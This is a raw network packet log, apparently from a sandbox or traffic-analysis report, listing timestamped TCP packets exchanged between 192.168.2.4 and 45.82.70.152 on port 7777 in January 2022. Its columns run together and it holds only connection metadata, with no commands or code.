                                                                                                                                  Jan 14, 2022 14:10:41.928579092 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928602934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928626060 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928627014 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928654909 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928674936 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928680897 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928705931 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928729057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928738117 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928754091 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928780079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928781033 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928803921 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928823948 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928829908 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928878069 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940028906 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940052986 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940068960 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940087080 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940103054 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940114975 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940119028 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940138102 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940155983 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940159082 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940172911 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940191031 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940198898 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940206051 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940218925 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940222979 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940241098 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940257072 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940270901 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940272093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940294027 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940294981 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940310955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940326929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940340996 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940342903 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940360069 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940360069 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940378904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940395117 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940412045 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940412045 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940431118 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940437078 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940448999 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940464973 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940471888 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940481901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940498114 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940512896 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940515041 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940531969 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940536976 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940551043 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940567970 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940577984 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940587044 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940603971 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940619946 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940628052 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940637112 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940654039 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940655947 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940670967 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940685034 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940689087 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940706968 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940713882 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940723896 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940743923 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940757036 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940759897 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940778017 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940782070 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940795898 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940813065 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940829039 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940833092 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940848112 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940856934 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940867901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940885067 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940891981 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940903902 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940921068 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940936089 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940954924 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940953970 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940973043 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.940979958 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.940989971 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941000938 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941006899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941024065 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941035032 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941041946 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941060066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941066980 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941076994 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941093922 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941107988 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941108942 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941128969 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941139936 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941144943 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941160917 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941169024 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941178083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941194057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941203117 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941210985 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941229105 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941240072 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941245079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941262960 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941272974 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941277981 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941293001 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941294909 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941312075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941327095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941343069 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941344976 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941358089 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941390038 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941390991 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941412926 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941414118 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941432953 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941446066 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941452980 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941474915 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941490889 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941494942 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941517115 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941536903 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941545963 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941566944 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941584110 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941587925 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941610098 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941625118 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941631079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941653967 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941673040 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941673040 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941694975 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941711903 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941715956 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.941755056 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.941924095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955574989 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955609083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955646992 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955653906 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.955676079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955684900 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.955703020 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955729961 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955755949 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.955756903 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955784082 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955801964 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.955811024 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955837965 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955848932 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.955862999 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955890894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955904961 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.955921888 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955959082 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.955960035 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.955987930 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956012964 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956023932 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956038952 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956064939 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956075907 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956089020 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956115961 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956125975 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956140995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956167936 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956178904 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956195116 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956219912 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956229925 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956245899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956271887 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956281900 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956298113 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956324100 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956340075 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956355095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956382036 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956392050 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956409931 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956434965 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956444979 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956463099 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956487894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956501961 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956512928 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956540108 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956549883 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956567049 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956593037 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956607103 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956619978 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956645012 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956656933 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956685066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956711054 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956722975 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956737995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956764936 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956775904 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956790924 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956815958 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956830978 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956849098 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956876040 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956885099 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956901073 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956927061 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956945896 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.956953049 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956978083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.956995010 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.957004070 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.957030058 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.957041025 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.957947969 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.957994938 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.966902018 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.966939926 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.966975927 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.966984987 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967014074 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967047930 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967048883 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967086077 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967118979 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967123032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967156887 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967190027 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967194080 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967230082 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967262983 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967266083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967303038 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967335939 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967335939 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967375040 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967406988 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967411041 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967444897 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967479944 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967480898 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967516899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967550993 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967552900 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967592955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967624903 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967627048 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967664003 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967696905 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967699051 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967734098 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967767000 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967767954 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967803955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967838049 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967844963 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967876911 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967911005 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967920065 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.967947006 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967983961 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.967983961 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968019009 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968054056 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968058109 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968087912 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968123913 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968127012 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968159914 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968193054 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968204021 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968229055 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968262911 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968269110 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968297958 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968332052 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968337059 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968365908 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968400955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968401909 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.968436956 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968470097 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.968472004 CET497787777192.168.2.445.82.70.152
